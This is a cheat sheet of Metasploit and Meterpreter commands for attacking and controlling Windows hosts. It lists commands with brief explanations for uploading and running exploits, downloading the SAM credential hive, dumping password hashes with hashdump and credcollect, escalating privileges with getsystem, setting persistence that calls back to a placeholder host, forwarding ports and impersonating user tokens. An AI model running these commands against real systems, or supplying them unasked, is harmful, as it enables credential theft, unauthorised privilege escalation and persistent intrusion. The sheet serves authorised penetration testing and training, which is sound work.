🥷 Metasploit Meterpreter Cheat Sheet
Learn the most useful commands for Metasploit and Meterpreter
Metasploit commands
Identify other machines that the supplied domain user has administrative access to:
msf> run post/windows/gather/local_admin_search_enum
Communicate with a host, similar to interacting via netcat, taking advantage of any configured session pivoting:
msf> connect $TARGET $PORT
Uses SSL:
msf> connect -s $TARGET $PORT
Starts ruby shell:
msf> irb
Load plugins that integrate other tools (one plugin per load command):
msf> load pcap
msf> load wmap
msf> load nessus
Run nmap from Metasploit (use db_nmap instead of nmap to store the results in the database for the db_* commands below):
msf> nmap -v -sV 192.168.1.0/24 -oA subnet_1
Show scan data:
msf> db_hosts
msf> db_vulns
msf> db_exploited
Useful commands with Meterpreter
Upload file to Windows target:
meterpreter> upload file c:\\windows
Download file from Windows target:
meterpreter> download c:\\windows\\repair\\sam /tmp
Run .exe on target (handy for executing uploaded exploits):
meterpreter> execute -f c:\\windows\\temp\\exploit.exe
Creates new channel with cmd shell:
meterpreter> execute -f cmd -c
Show processes:
meterpreter> ps
Get shell on the target:
meterpreter> shell
Attempts privilege escalation on the target:
meterpreter> getsystem
Attempts to dump the password hashes on the target (credcollect is a script and must be run with run):
meterpreter> hashdump
meterpreter> run credcollect
Create port forward to target machine:
meterpreter> portfwd add -l 3389 -p 3389 -r $IP
Delete port forward:
meterpreter> portfwd delete -l 3389 -p 3389 -r $IP
Search Excel files on target machine:
meterpreter> search -f *.xlsx
Get user id:
meterpreter> getuid
Check that the target architecture matches the Meterpreter payload; if the target is x64 and Meterpreter is x86, migrate into an x64 process:
meterpreter> sysinfo
Meterpreter persistence mode:
meterpreter> run persistence -U -i 5 -p 443 -r $IP
Impersonate any user (token impersonation with the incognito extension):
meterpreter> use incognito
meterpreter> list_tokens -u
meterpreter> impersonate_token MACHINE\\user
meterpreter> drop_token